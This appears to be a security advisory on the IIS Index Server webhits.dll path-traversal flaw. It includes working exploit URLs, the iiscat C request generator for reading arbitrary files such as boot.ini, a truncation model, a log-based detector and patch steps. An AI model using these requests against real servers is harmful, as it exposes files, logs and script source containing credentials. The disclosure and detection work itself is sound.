COMMAND
Webhits.dll
SYSTEMS AFFECTED
Index Server 2, Indexing Service in Windows 2000
PROBLEM
David Litchfield found the following. Internet Information Server 4.0
ships with an ISAPI application, webhits.dll, that provides
hit-highlighting functionality for Index Server. Files that have
the extension .htw are dispatched to webhits.dll.
A vulnerability exists in webhits, however, that allows an attacker
to break out of the web virtual root file system and gain
unauthorized access to other files on the same logical disk drive,
such as customer databases, log files or any file they know or
can ascertain the path to. The same vulnerability can be used to
obtain the source of Active Server Pages or any other server-side
script file, which often contain user IDs and passwords as well as
other sensitive information.
Even if you have no .htw files on your system you are probably
still vulnerable. A quick test to show whether you are vulnerable: go
to http://YOUR_WEB_SERVER_ADDRESS_HERE/nosuchfile.htw If you
receive a message stating the "format of the QUERY_STRING is
invalid" you _are_ vulnerable. This test only tells you whether you
are vulnerable _before_ you apply the patch. After you install the
patch you _will_ still get the same message, so the test cannot be
used to confirm that the patch is in place. Cerberus Information
Security's free vulnerability scanner - CIS - now contains a check
for this issue - available from the website
http://www.cerberus-infosec.co.uk/
This vulnerability exploits two problems and for the sake of
clarity this section will be split into two.
1) If you DO have .htw files on your system
*******************************************
The hit-highlighting functionality provided by Index Server allows
a web user to have a document returned with their original search
terms highlighted on the page. The name of the document is passed
to the .htw file in the CiWebHitsFile argument. webhits.dll, the
ISAPI application that deals with the request, opens that file,
highlights it accordingly and returns the resulting page. Because
the user controls the CiWebHitsFile argument passed to the
.htw file, they can request pretty much any file they want. A
secondary problem is that the source of ASP and other scripted
pages is revealed too, because webhits returns the file as text
rather than handing it to the script engine.
Worse, webhits.dll follows double-dot path components, so an attacker
is able to gain access to files outside the web virtual root. For
example, to view the web access logs for a given day the attacker
would build the following URL:
http://charon/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full
Sample .htw files often installed and left on the system are
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iishelp/iis/misc/iirturnh.htw (this .htw is normally restricted to loopback)
2) If you DON'T have any .htw files on your system
**************************************************
To invoke the webhits.dll ISAPI application a request needs to be
made to a .htw file, but if you don't have any on your web server
you might wonder why you are still vulnerable: requesting a
non-existent .htw file will fail. The trick is to get
inetinfo.exe to invoke webhits.dll but then also get webhits.dll
to open an existing file. We achieve this by crafting a special
URL.
First we need a valid resource. This must be a static file such as
a .htm, .html, .txt or even a .gif or a .jpg. This will be the
file opened by webhits.dll as the template file.
Now we need to get inetinfo.exe to pass it along to webhits for
dispatch, and the only way we can do this is by requesting a .htw
file.
http://charon/default.htm.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full
will fail, obviously: there is no file on the system with
that name.
Notice that we have now invoked webhits, however, and by placing a
specific number of spaces (%20s) between the existing resource
and the .htw it is possible to trick the web service. The
buffer that holds the name of the .htw file to open is truncated,
causing the .htw part to be removed, so when webhits.dll
attempts to open the file it succeeds and we are returned the
contents of the file we want to access without there being a
real .htw file on the system.
The code is probably doing something similar to this:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
FILE *fd;
int DoesTemplateExist(char *pathtohtwfile)
{
// Just in case inetinfo.exe passes too long a string
// let's make sure it's of a suitable length and not
// going to open a buffer overrun vulnerability
char *file;
file = (char *)malloc(251);
strncpy(file,pathtohtwfile,250);
// strncpy() does not terminate the copy when the source is 250
// bytes or longer, so terminate it here. Anything past byte 250
// (for example a trailing ".htw") is silently dropped.
file[250] = '\0';
fd = fopen(file,"r");
free(file);
// Success
if(fd !=NULL)
{
return 1;
}
// failed
else
{
return 0;
}
}
Here webhits.dll "contains" a function called DoesTemplateExist()
which is passed a pointer to a 260-byte string buffer
containing the path to the .htw file to open, but this path is
further reduced in length by the strncpy() call, which drops
whatever was stored in the last ten bytes (in this case the .htw
of the HTTP REQUEST_URI), so when fopen() is called it succeeds.
This works because Windows NT ignores trailing spaces in a
file name.
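As an added illustration (not part of Litchfield's advisory and not code from webhits.dll), the following C program models both halves of the trick: a copy that truncates at a fixed limit and so drops the ".htw", and NT's handling of trailing spaces, which then makes the truncated name resolve to the static file. It assumes the 250-byte limit guessed above and an assumed physical path C:\Inetpub\wwwroot\default.htm as the name the code copies; the exact number of spaces in a real request depends on which form of the name (virtual or physical) webhits actually copies, which the advisory does not establish. It also shows the check a hardened version would make: refuse over-long names instead of truncating them, and validate the extension and path components on the name that will actually be opened.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed copy limit, matching the 250-byte guess in the text above. */
#define TEMPLATE_LIMIT 250

/* Vulnerable model: copy at most `limit` bytes of the requested name into a
 * fresh buffer. Anything beyond the limit (the attacker's ".htw") is lost. */
char *truncating_copy(const char *name, size_t limit)
{
    char *out = malloc(limit + 1);
    if (out == NULL) return NULL;
    strncpy(out, name, limit);
    out[limit] = '\0';
    return out;
}

/* Models NT ignoring trailing spaces: "default.htm   " opens default.htm. */
void trim_trailing_spaces(char *s)
{
    size_t n = strlen(s);
    while (n > 0 && s[n - 1] == ' ') s[--n] = '\0';
}

/* Spaces to insert between `resource` and ".htw" so the ".htw" starts exactly
 * at the copy limit. 0 means the name alone already fills the buffer. */
size_t padding_needed(const char *resource, size_t limit)
{
    size_t len = strlen(resource);
    return len >= limit ? 0 : limit - len;
}

/* Build "<resource><spaces>.htw", i.e. the request name after URL decoding
 * (each space travels as %20). Caller frees the result. */
char *build_padded_name(const char *resource, size_t limit)
{
    size_t len = strlen(resource), pad = padding_needed(resource, limit);
    char *out = malloc(len + pad + sizeof ".htw");
    if (out == NULL) return NULL;
    memcpy(out, resource, len);
    memset(out + len, ' ', pad);
    strcpy(out + len + pad, ".htw");
    return out;
}

/* Case-insensitive ".htw" suffix check on the name exactly as given. */
int ends_with_htw(const char *s)
{
    size_t n = strlen(s);
    if (n < 4) return 0;
    return s[n - 4] == '.' && tolower((unsigned char)s[n - 3]) == 'h' &&
           tolower((unsigned char)s[n - 2]) == 't' && tolower((unsigned char)s[n - 1]) == 'w';
}

/* Hardened check on the name that will actually be opened: refuse over-long
 * names rather than truncating, refuse trailing spaces or dots (which NT
 * strips), refuse ".." components, and require the extension to survive. */
int template_name_ok(const char *name, size_t limit)
{
    size_t n = strlen(name);
    if (n == 0 || n > limit) return 0;
    if (name[n - 1] == ' ' || name[n - 1] == '.') return 0;
    if (strstr(name, "..") != NULL) return 0;
    return ends_with_htw(name);
}

int main(void)
{
    const char *resource = "C:\\Inetpub\\wwwroot\\default.htm"; /* assumed path */
    char *padded = build_padded_name(resource, TEMPLATE_LIMIT);
    char *seen = truncating_copy(padded, TEMPLATE_LIMIT);

    printf("requested name: %zu bytes, ends with .htw: %d\n", strlen(padded), ends_with_htw(padded));
    trim_trailing_spaces(seen);
    printf("name actually opened: \"%s\"\n", seen);
    printf("hardened check accepts the request: %d\n", template_name_ok(padded, TEMPLATE_LIMIT));
    free(padded);
    free(seen);
    return 0;
}
```

Note that the hardened check is applied to the full, untruncated name: checking the extension on the request as received and then truncating it is exactly the ordering the vulnerable model gets wrong.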
Fredrik Widlund added the following.
/*
fredrik.widlund@defcom-sec.com
example: iiscat ../../../../boot.ini
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv)
{
/* request buffer, the file to read through webhits, and the existing
   static resource that becomes the "template" once .htw is truncated */
char request[2048], *request_p, *file_read, *file_valid = "/default.htm";
/* assumed size of the buffer webhits copies the template name into */
int file_buf_size = 250;
if (!((argc == 2 && argv[1] && strlen(argv[1]) < 1024) ||
(argc == 3 && argv[1] && argv[2] && strlen(argv[1]) <= file_buf_size && strlen(argv[2]) < 1024)))
{
fprintf(stderr, "usage: iiscat file_to_read [valid_file]\n");
exit(1);
}
file_read = argv[1];
if (argc == 3)
file_valid = argv[2];
sprintf(request, "GET %s", file_valid);
request_p = request + strlen(request);
/* pad with %20 until the name fills the buffer, so ".htw" falls off the end */
file_buf_size -= strlen(file_valid);
while(file_buf_size)
{
strcpy(request_p, "%20");
request_p += 3;
file_buf_size--;
}
sprintf(request_p, ".htw?CiWebHitsFile=%s&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n", file_read);
puts(request);
exit(0);
}
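Added example (not part of Widlund's tool or of the advisory): detection logic, in C to match the rest of the page, that scans IIS W3C extended log lines for the two request shapes described above: a .htw request whose CiWebHitsFile value contains "..", and a .htw request whose stem carries the space padding that iiscat emits. The log lines are constructed for this example; they assume the field order `date time c-ip cs-method cs-uri-stem cs-uri-query sc-status` and that a space in the stem is logged URL-encoded as %20 (a '+' is also decoded as a space). The padding is shortened to a few %20s for readability; the check keys on a space immediately before ".htw", not on the count.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum { IND_HTW = 1, IND_TRAVERSAL = 2, IND_PADDED = 4 };

/* Decode %XX escapes and '+' into dst; dst must hold strlen(src)+1 bytes. */
static void url_decode(const char *src, char *dst)
{
    while (*src) {
        if (*src == '%' && isxdigit((unsigned char)src[1]) && isxdigit((unsigned char)src[2])) {
            char hex[3] = { src[1], src[2], '\0' };
            *dst++ = (char)strtol(hex, NULL, 16);
            src += 3;
        } else if (*src == '+') { *dst++ = ' '; src++; }
        else { *dst++ = *src++; }
    }
    *dst = '\0';
}

/* Case-insensitive substring search: query parameter names are not case-sensitive. */
static const char *stristr(const char *hay, const char *needle)
{
    size_t nl = strlen(needle);
    for (; *hay; hay++) {
        size_t i = 0;
        while (i < nl && hay[i] && tolower((unsigned char)hay[i]) == tolower((unsigned char)needle[i])) i++;
        if (i == nl) return hay;
    }
    return NULL;
}

static int ends_with_htw(const char *s)
{
    size_t n = strlen(s);
    return n >= 4 && s[n - 4] == '.' && tolower((unsigned char)s[n - 3]) == 'h' &&
           tolower((unsigned char)s[n - 2]) == 't' && tolower((unsigned char)s[n - 1]) == 'w';
}

/* Classify one request by its logged cs-uri-stem and cs-uri-query; returns IND_* bits. */
int classify_request(const char *stem, const char *query)
{
    char *dstem = malloc(strlen(stem) + 1), *dquery = malloc(strlen(query) + 1);
    int ind = 0;
    if (dstem == NULL || dquery == NULL) { free(dstem); free(dquery); return 0; }
    url_decode(stem, dstem);
    url_decode(query, dquery);
    if (ends_with_htw(dstem)) {
        size_t n = strlen(dstem);
        const char *v = stristr(dquery, "CiWebHitsFile=");
        ind |= IND_HTW;
        /* a space immediately before ".htw" is the padding trick */
        if (n > 4 && dstem[n - 5] == ' ') ind |= IND_PADDED;
        /* ".." anywhere inside the CiWebHitsFile value is the traversal */
        if (v != NULL) {
            size_t i, vlen;
            v += strlen("CiWebHitsFile=");
            vlen = strcspn(v, "&");
            for (i = 0; i + 1 < vlen; i++)
                if (v[i] == '.' && v[i + 1] == '.') { ind |= IND_TRAVERSAL; break; }
        }
    }
    free(dstem);
    free(dquery);
    return ind;
}

/* Plain hit-highlighting of a document under the web root is legitimate;
 * alert only on traversal or padding combined with a .htw request. */
int is_alert(int ind)
{
    return (ind & IND_HTW) && (ind & (IND_TRAVERSAL | IND_PADDED));
}

/* Constructed sample log in W3C extended format (not real server output). */
const char SAMPLE_LOG[] =
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status\n"
    "2000-01-21 10:01:02 10.0.0.5 GET /default.htm - 200\n"
    "2000-01-21 10:01:09 10.0.0.5 GET /iissamples/issamples/oop/qfullhit.htw CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full 200\n"
    "2000-01-21 10:01:15 10.0.0.5 GET /default.htm%20%20%20%20.htw CiWebHitsFile=/../../boot.ini&CiRestriction=none&CiHiliteType=Full 200\n"
    "2000-01-21 10:02:00 10.0.0.9 GET /iissamples/issamples/oop/qfullhit.htw CiWebHitsFile=/iissamples/exair/default.htm&CiRestriction=exair&CiHiliteType=Full 200\n";

/* Scan a whole log, print each alert line and return the number of alerts. */
int scan_log(const char *log)
{
    int alerts = 0;
    const char *p = log;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char *line = malloc(len + 1);
        if (line == NULL) return alerts;
        memcpy(line, p, len);
        line[len] = '\0';
        if (line[0] != '#') {               /* skip #Fields / #Software directives */
            char *field[7] = { 0 }, *tok = strtok(line, " ");
            int i = 0;
            while (tok && i < 7) { field[i++] = tok; tok = strtok(NULL, " "); }
            if (i == 7 && is_alert(classify_request(field[4], field[5]))) {
                alerts++;
                printf("ALERT %s %s %s %s?%s\n", field[0], field[1], field[2], field[4], field[5]);
            }
        }
        free(line);
        p = nl ? nl + 1 : p + len;
    }
    return alerts;
}

int main(void) { printf("%d alert(s)\n", scan_log(SAMPLE_LOG)); return 0; }
```

Two of the four sample requests are flagged: the sample-file traversal from the first half of the advisory and the padded default.htm request from the second. The final line, a .htw request whose CiWebHitsFile stays inside the web root, is ordinary hit highlighting and is left alone, though on a server with no .htw files any .htw request at all is worth a look.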
SOLUTION
.htw needs to be unassociated from webhits.dll. To do this open
the Internet Service Manager (MMC). In the left hand pane right
click the computer you wish to administer and from the menu that
pops up choose Properties.
From the Master Properties select the WWW Service and then click
Edit. The WWW Service Master Properties window should open. From
here click on the Home Directory tab and then click the
Configuration button. You should be presented with an App
Mappings tab in the Application Mappings window. Find the .htw
extension, highlight it and click Remove. If a
confirmation window pops up select Yes to remove. Finally click
on Apply, select all of the child nodes this should apply to
and then click OK. Now close all of the WWW Service property
windows. Once the mapping is gone, .htw requests are no longer
handed to webhits.dll, so the nosuchfile.htw test above should no
longer return the QUERY_STRING message.
Patch availability:
Index Server 2.0:
- Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17727
- Alpha: http://www.microsoft.com/downloads/release.asp?ReleaseID=17728
Indexing Services for Windows 2000:
- Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17726